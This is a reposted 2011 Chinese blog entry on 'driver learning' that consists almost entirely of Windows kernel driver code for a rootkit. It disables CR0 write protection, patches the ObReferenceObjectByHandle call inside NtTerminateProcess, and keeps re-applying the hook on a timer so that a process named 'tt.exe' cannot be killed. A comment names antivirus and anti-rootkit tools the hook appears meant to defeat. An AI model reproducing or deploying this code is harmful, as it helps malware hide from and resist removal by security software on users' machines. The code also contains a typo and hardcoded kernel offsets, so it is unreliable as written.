驱动学习----RootKits---InlineHook

from:http://blog.sina.com.cn/s/blog_61d65e360100o5lx.html

驱动学习----RootKits---InlineHook(原创)

(2011-01-03 11:03:22)

转载▼

InlineHook ----ObReferenceObjectByHandle

///Inline_Hook ObReferenceObjectByHandle
// By Yankai cleveise Auti Micropoint 360safe IceSword ....

#include <ntddk.h>
#define STATUS_WARNING ((NTSTATUS)0x80000000L)
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")

#define PAGEDDATA data_seg("PAGE")
#define LOCKEDDATA data_seg()
#define ININDATA data_seg("INIT")

typedef struct _LDR_DATA_TABLE_ENTRY{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
LIST_ENTRY HashLinks;
PVOID SectionPointer;
ULONG CheckSum;
ULONG TimeDataStamp;
PVOID LoadedImports;
PVOID EntryPointActivationContext;
PVOID PatchInformation;
}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;

ULONG ObReferenceObjectByHandleAddress;
ULONG NtTerminateProcessAddress;
ULONG Recover;
PULONG InsertAddress;
KTIMER timer;
KDPC mydpc;
LARGE_INTEGER largeint;
LONG RootkitAddress;
char* ProtectName="tt.exe";

VOID MyUnload(PDRIVER_OBJECT pdriverobj)
{
KeCancelTimer(&timer);
*InsertAddress=Recover;
}

#pragma LOCKEDCODE
VOID DPCFUN()
{
ULONG xxx;
_asm
{
cli
push eax;
mov eax,CR0;
mov xxx,eax;
and eax,0x0FFFEFFFF;
mov CR0,eax;
pop eax;
sti
};

*InsertAddress=(ULONG)RootkitAddress;

_asm
{
push eax;
mov eax,xxx;
mov CR0,eax;
pop eax;
};

KeSetTimer(&timer,largeint,&mydpc);
}

MYObReferenceObjectByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
NTSTATUS status;
PEPROCESS Process;
POBJECT_TYPE xx;
xx=*PsProcessType;
if (xx==ObjectType)
{
status=ObReferenceObjectByHandl(Handle,DesiredAccess,ObjectType,AccessMode,&Process,HandleInformation);
if (_stricmp((char*)((char*)Process+0x174), ProtectName) == 0)
{
if (Handle==(HANDLE)-1)
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
else
{
status=STATUS_WARNING;
return status ;

}

}
else
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
}
else
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
return status;
}

_declspec(naked)RootkitObReferenceObjectByHandle()
{
_asm
{
push ebp;
mov ebp,esp;
sub esp,0x10;
mov ebp,MYObReferenceObjectByHandle;
mov dword ptr [esp],ebp;
mov ebp,dword ptr [esp+10h];
ret 10h;
};

}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath)
{
NTSTATUS status=STATUS_SUCCESS;
KIRQL oldirql;
UNICODE_STRING ObReferenceObjectByHandleName;
int i;
char FindCode[]={0x6A,0x01,0xFF,0x75,0x08,0xE8};
char CheckCode[]={0x8B,0xFF,0x55};
LONG Offset;
LONG uAttr;
ULONG NtTerminateProcessOffset=0x0F1C2A;
char* PointYK;
PULONG DriverAddress;
PULONG DriverSection;
PLIST_ENTRY plistbegin;
PLIST_ENTRY plistend;
PLDR_DATA_TABLE_ENTRY pldr;
UNICODE_STRING DllName;
ULONG ntoskrnladdr;
UNICODE_STRING filename;

largeint.QuadPart=-550000;
RtlInitUnicodeString(&filename,L"ntoskrnl.exe");
RtlInitUnicodeString(&ObReferenceObjectByHandleName,L"ObReferenceObjectByHandle");
KeInitializeDpc(&mydpc,(PKDEFERRED_ROUTINE)DPCFUN,NULL);
KeInitializeTimer(&timer);

pDriverObject->DriverUnload=MyUnload;

ObReferenceObjectByHandleAddress=(ULONG)MmGetSystemRoutineAddress(&ObReferenceObjectByHandleName);
DriverAddress=(ULONG*)pDriverObject;
DriverSection=(ULONG*)(*(ULONG*)((char*)DriverAddress+0x014));
plistbegin=plistend=DriverSection;

pldr=(PLDR_DATA_TABLE_ENTRY)plistbegin;
DllName=pldr->BaseDllName;
do
{
pldr=(PLDR_DATA_TABLE_ENTRY)(pldr->InLoadOrderLinks.Flink);
DllName=pldr->BaseDllName;
if (RtlCompareUnicodeString(&DllName, &filename,TRUE) == 0)
{
ntoskrnladdr=(ULONG)(pldr->DllBase);
break;
}
plistend=(PLIST_ENTRY)pldr;

}while(plistbegin!=plistend);

NtTerminateProcessAddress=ntoskrnladdr+NtTerminateProcessOffset;

PointYK=(char*)NtTerminateProcessAddress;

if (!(PointYK[0]==CheckCode[0] && PointYK[1]==CheckCode[1] && PointYK[2]==CheckCode[2]))
{
return 0;
}

for (i=0;i<200;i++)
{
if (PointYK[i]==FindCode[0] && PointYK[i+1]==FindCode[1] && PointYK[i+2]==FindCode[2] && PointYK[i+3]==FindCode[3] && PointYK[i+4]==FindCode[4] && PointYK[i+5]==FindCode[5])
{
InsertAddress=(PULONG)(PointYK+i+6);
Recover=(ULONG)*InsertAddress;
Offset=(ULONG)InsertAddress+4;
RootkitAddress=(ULONG)RootkitObReferenceObjectByHandle-Offset;
break;
}

}

oldirql=KeRaiseIrqlToDpcLevel();
_asm
{
cli
push eax;
mov eax,CR0;
mov uAttr,eax;
and eax,0x0FFFEFFFF;
mov CR0,eax;
pop eax;
sti
};

*InsertAddress=(ULONG)RootkitAddress;

_asm
{
push eax;
mov eax,uAttr;
mov CR0,eax;
pop eax;
};
KeLowerIrql(oldirql);

KeSetTimer(&timer,largeint,&mydpc);

return status;
}